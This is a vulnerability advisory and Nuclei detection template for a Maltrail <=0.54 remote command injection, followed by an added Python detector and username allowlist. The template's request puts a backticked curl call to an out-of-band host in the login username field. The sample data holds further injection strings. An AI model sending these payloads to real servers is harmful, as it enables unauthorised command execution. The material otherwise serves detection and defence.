Vulnerability description
Maltrail versions <=0.54 are affected. A remote attacker can execute arbitrary operating system commands via the username parameter in a POST request to the /login endpoint.
id: CVE-2025-34073

info:
  name: Maltrail <=0.54 Username Parameter - Remote Command Execution
  author: SeungAh-Hong
  severity: critical
  description: |
    Maltrail versions <=0.54. A remote attacker can execute arbitrary operating system commands via the username parameter in a POST request to the /login endpoint.
  reference:
    - https://huntr.com/bounties/be3c5204-fbd9-448d-b97c-96a8d2941e87
    - https://vulncheck.com/advisories/stamparm-maltrail-rce
    - https://github.com/stamparm/maltrail/issues/19146
    - https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/unix/http/maltrail_rce.rb
  metadata:
    max-request: 1
    shodan-query: http.title:"Maltrail"
    fofa-query: app="Maltrail"
  tags: cve,cve2025,maltrail,rce,unauth,oss,vuln

http:
  - raw:
      - |
        POST /login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        username=;`curl http://{{interactsh-url}}`

    matchers:
      - type: dsl
        dsl:
          - 'contains(header, "Maltrail")'
          - "contains(interactsh_protocol, 'http') || contains(interactsh_protocol, 'dns')"
        condition: and
# digest: 4a0a00473045022100e7e0e3c26e7c87836f3d0382274d16bec58fd64019a37202d47efe3c1c7ae0a502200484d1948fdcebd1e683ffd61ca84c95de0333c982c14014bb51e8c29b563de7:922c64590222798bb761d5b6d8e72950
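The template above exercises one request shape: a POST to /login whose username field carries shell metacharacters. The following is an added example, not part of the Nuclei template or of the Maltrail project, showing the defender's side of the same fact: a detector that flags such login bodies in captured requests, and the allowlist check a login handler should apply before the username reaches anything that resembles a shell. The request records, the `SHELL_META` rule and the `USERNAME_OK` allowlist are constructed for this demo and are assumptions, not Maltrail's own policy.

```python
"""
Added example (not from the Nuclei template or the Maltrail project):
flag POST /login requests whose username carries shell metacharacters,
and show the allowlist validation that prevents the injection class.
"""
import re
from typing import List, Optional, Tuple
from urllib.parse import parse_qs

# Characters that carry meaning to a POSIX shell. Any of them inside a
# login username is a strong indicator of a command-injection attempt.
# (Detection rule constructed for this example.)
SHELL_META = re.compile(r"[;|&`$<>\n\r]")

# Defensive allowlist: what a legitimate username may contain.
# (Assumption for this example; adjust to the deployment's real policy.)
USERNAME_OK = re.compile(r"^[A-Za-z0-9._-]{1,64}$")


def extract_username(body: str) -> Optional[str]:
    """Return the decoded username field of a urlencoded body, or None."""
    fields = parse_qs(body, keep_blank_values=True)
    values = fields.get("username")
    return values[0] if values else None


def is_suspicious_login(method: str, path: str, body: str) -> bool:
    """True when a POST /login body has shell metacharacters in username."""
    if method.upper() != "POST" or path.split("?", 1)[0] != "/login":
        return False
    user = extract_username(body)
    return user is not None and SHELL_META.search(user) is not None


def validate_username(user: str) -> bool:
    """Mitigation side: accept only allowlisted usernames, reject the rest.
    A handler that applies this before logging or shelling out never sees
    the metacharacters the detector above looks for."""
    return USERNAME_OK.fullmatch(user) is not None


def scan_requests(records: List[Tuple[str, str, str]]) -> List[str]:
    """Run the detector over (method, path, body) tuples; return flagged bodies."""
    return [body for method, path, body in records
            if is_suspicious_login(method, path, body)]


# Constructed sample requests: one benign login, one mirroring the template's
# backticked shape, one $( ) variant, and one on a path the rule ignores.
SAMPLE_REQUESTS = [
    ("POST", "/login", "username=admin&password=hunter2"),
    ("POST", "/login", "username=%3B%60id%60&password=x"),
    ("POST", "/login", "username=a%24%28id%29&password=x"),
    ("POST", "/events", "username=%3B%60id%60"),
]

if __name__ == "__main__":
    for hit in scan_requests(SAMPLE_REQUESTS):
        print("suspicious /login body:", hit)
```

The detector keys on the decoded value, so percent-encoded payloads (as a real client would send them) are caught the same way as the literal form in the template. The allowlist is the actual fix: rejecting anything outside a known-good character set is simpler and more robust than trying to escape shell syntax.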